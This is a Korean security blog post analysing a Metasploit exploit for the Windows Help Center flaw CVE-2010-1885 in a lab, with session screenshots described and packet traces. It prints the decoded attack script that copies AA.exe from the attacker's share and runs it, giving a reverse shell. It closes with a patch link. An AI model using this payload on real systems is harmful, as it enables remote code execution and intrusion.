0x02 analysis2010. 6. 25. 15:54

2010/06/18 - [0x06 vul info] - CVE-2010-1885 취약점


Metasploit에 exploit이 추가되었습니다.


0x01 Metasploit exploit




클라이언트에서 http://172.17.9.140 으로 접속하면 exploit 코드가 실행되면서 도움말센터가 실행됩니다.
exploit 코드가 동작하면서 AA.exe 파일이 공격자(172.17.9.140)의 9999포트로 연결합니다.



세션을 확인하고 연결해 봤습니다.




연결된 공격대상의 shell(cmd.exe)를 실행하니 잘됩니다. ㅎㅎ




VNC를 실행하니 랜덤한 파일명의 exe 파일이 공격자의 4545포트로 붙는군요..




VNC 정상동작하고 화면제어 잘 됩니다.



0x02 Packet




exploit이 동작하는 순간부터의 패킷입니다.

/ -> /IG48oJvQDE -> /A/rA.html







/A/rA,html에 hcp 취약을 공격하는 코드가 포함되어 있습니다.

iframe 내에 있는 코드를 디코딩해보면 아래와 같은 스크립트가 생성됩니다.

<script defer>eval(unescape('Run(String.fromCharCode('cmd /c echo WScript.CreateObject("WScript.Shell").Run "cmd /c copy \\172.17.9.140\A\AA.exe %TEMP% && %TEMP%\AA.exe",0,false>%TEMP%\xB.vbs|cscript %TEMP%\xB.vbs>nul));'))</script>


공격이 성공한 이후에는 9999 포트로 통신을 합니다.





다른 분석글 링크 몇개 겁니다. 참고하세요~

http://contagiodump.blogspot.com/2010/06/jun-17-win-xp-sp2-sp3-0-day-cve-2010.html
http://blog.trendmicro.com/microsoft-help-center-zero-day-exploits-loose/






이 취약점을 해결하시려면 아래 링크를 참조하세요.

http://support.microsoft.com/kb/2219475


Posted by demantos